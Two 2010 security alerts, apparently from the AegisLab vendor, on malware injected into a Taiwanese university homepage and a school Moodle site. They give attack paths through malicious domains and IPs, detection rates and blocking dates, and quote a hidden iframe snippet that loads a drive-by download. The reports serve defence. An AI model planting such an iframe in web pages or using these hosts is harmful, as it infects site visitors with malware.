[ Security Alert ] 24 November, 2010 10:29

     Our lab found a malare executable was injected in one univeristy web page, the web page is not fixed yet at this moment. We add the detailed analysis as below.

    Attack path:
    [root] hxxp://www.math.ndhu.edu.tw/  (PageRank: 4)
      [virus] hxxp://secure.manualstats20.com/images/5d31b7e88247f0b2f4663ec104293815.php?u=47&s=56179768&c=d& 

    There is an embedded script in the bottom of homepage.

    After decoding, the original script is as below.

 

    After execution of this script, a piece of HTML code "<iframe src='http://secure.manualstats20.com/images/d' width='10' height='10' style='visibility: hidden;></iframe>" will be inserted into homepage.

    The malware has medium detection rate in VT:  14 /43 (32.6%) ( http://www.virustotal.com/file-scan/report.html?id=7d6db256e13677c44fcc80ebc1d60b8cac08b98b4bb9766e2733fac70d902fdf-1290470915 )

    The download path has low detection rate in URLvoid: 1/17 (6 %) ( http://www.urlvoid.com/scan/secure.manualstats20.com )

    AegisLab WebGuard stops the download path from 2010-11-22.

 

[ Security Alert ] 09 November, 2010 10:11

     In July, we discovered an elementary school on line learning web site was injected with lots of SEO poisoned page, but today we found it was invanded again. The new hopping site is "77.78.247.175", with zero detection rate in all URL filter, and the final download fake-AV exectutable also has low detection rate (16%).

§ Attack path:
[search] http://www.google.com  
 [root] hxxp://moodle.wyes.tcc.edu.tw/moodle/k/w/2086161388.php
  [hopping]hxxp://77.78.247.175/index.php?wci...
   [script] hxxp://77.78.247.217/index.php?EB=07...
    [virus] hxxp://77.78.247.217/index.php?85K7=z3qbX

§ Anti-Virus: Final download fake-AV exectutable has low detection rate in VT: 7/42 (16.7%)
   ( http://www.virustotal.com/file-scan/report.html?id=c4df34669ed6a6c136e50a36bf0428075cbe369d0eab7de077a384fc7b203991-1289267295)

§ URL filter : No URL filter can stop this hopping site: 0/6 (0.0%)
(http://www.virustotal.com/url-scan/report.html?id=a83ce54f73db7e5cf88b7a9d520991c4-1289263966)
 

AegisLab WebGuard DB stops this hopping site from 2010-11-09.

By AegisLab